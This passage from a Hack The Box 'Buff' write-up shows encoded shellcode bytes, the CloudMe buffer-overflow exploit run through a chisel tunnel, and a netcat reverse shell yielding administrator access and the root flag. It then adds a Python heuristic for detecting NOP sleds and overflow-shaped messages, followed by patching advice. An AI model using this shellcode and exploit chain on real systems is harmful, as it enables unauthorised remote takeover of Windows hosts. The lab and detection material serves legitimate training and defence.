buf += b"\x80\x7b\x5c\x6f\x4e\xe9\x3b\x6f\x19\x12\x94\x38"
buf += b"\x4e\xe4\xed\xac\x62\x5f\x44\xd2\x7e\x39\xaf\x56"
buf += b"\xa5\xfa\x2e\x57\x28\x46\x15\x47\xf4\x47\x11\x33"
buf += b"\xa8\x11\xcf\xed\x0e\xc8\xa1\x47\xd9\xa7\x6b\x0f"
buf += b"\x9c\x8b\xab\x49\xa1\xc1\x5d\xb5\x10\xbc\x1b\xca"
buf += b"\x9d\x28\xac\xb3\xc3\xc8\x53\x6e\x40\xe8\xb1\xba"
buf += b"\xbd\x81\x6f\x2f\x7c\xcc\x8f\x9a\x43\xe9\x13\x2e"
buf += b"\x3c\x0e\x0b\x5b\x39\x4a\x8b\xb0\x33\xc3\x7e\xb6"
buf += b"\xe0\xe4\xaa"
╭─kali@kali ~/HTB/buff
We replace the payload in the exploit script with this buffer and run it; the script's target of 127.0.0.1 now reaches CloudMe on the box through the chisel reverse forward:
╭─kali@kali ~/HTB/buff
╰─$ python2.7 48389.py
We get a shell on our listener, and it is the administrator's, since the shellcode runs in the context of the CloudMe process:
╭─kali@kali ~/HTB/buff
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.198] 49742
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>cd ../
cd ../
C:\Windows>cd ../
cd ../
C:\>cd users
cd users
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
de8696af583cd283e900906f518680d0
C:\Users\Administrator\Desktop>se
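The privilege escalation above is a classic stack overflow: a long NOP-padded buffer, a 4-byte return address, a short NOP slide and a few hundred bytes of encoded shellcode, delivered to a service that happens to run as administrator. As an added example from the detection side (not part of this writeup or of the CloudMe PoC), here is a heuristic a host-based or tunnel-endpoint inspector could apply to a message destined for that service: flag oversized messages, long runs of 0x90, and bodies that are mostly non-printable. The benign message and the overflow-shaped sample are constructed; the latter follows the PoC's layout with placeholder bytes only.

```python
import string

PRINTABLE = set(string.printable.encode())
NOP = 0x90


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of a single byte value."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (1.0 for empty input)."""
    if not data:
        return 1.0
    return sum(b in PRINTABLE for b in data) / len(data)


def inspect_payload(data: bytes, max_len: int = 512, sled_min: int = 64,
                    min_printable: float = 0.5) -> list[str]:
    """Return the reasons a message looks like an overflow attempt (empty list = clean).
    Thresholds are assumptions for this example; tune them to the protocol being watched."""
    reasons = []
    if len(data) > max_len:
        reasons.append(f"length {len(data)} exceeds {max_len}")
    run = longest_run(data, NOP)
    if run >= sled_min:
        reasons.append(f"run of {run} NOP (0x90) bytes")
    if len(data) >= 64 and printable_ratio(data) < min_printable:
        reasons.append(f"only {printable_ratio(data):.0%} printable bytes")
    return reasons


# Constructed samples
BENIGN = b"GET /status HTTP/1.0\r\n\r\n"
# Same layout as the PoC (padding, 4-byte return address, NOP slide, encoded payload)
# but with placeholder bytes: a stand-in for testing the detector, not a working exploit.
OVERFLOW_SHAPED = (b"\x90" * 1052 + b"RETA" + b"\x90" * 30
                   + bytes((i * 37) % 251 + 1 for i in range(351)))

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("overflow-shaped", OVERFLOW_SHAPED)):
        print(label, inspect_payload(sample) or ["clean"])
```

Two caveats follow from the writeup itself. CloudMe here is bound to 127.0.0.1, so the overflow traffic only ever crosses the wire inside the chisel tunnel; a network sensor sees nothing, and the heuristic has to run on the host or at the tunnel endpoint. And detection is second-best: the durable fixes are patching CloudMe past 1.11.2 and not letting a desktop sync client run with administrator rights, which is the only reason the shell above is buff\administrator rather than buff\shaun.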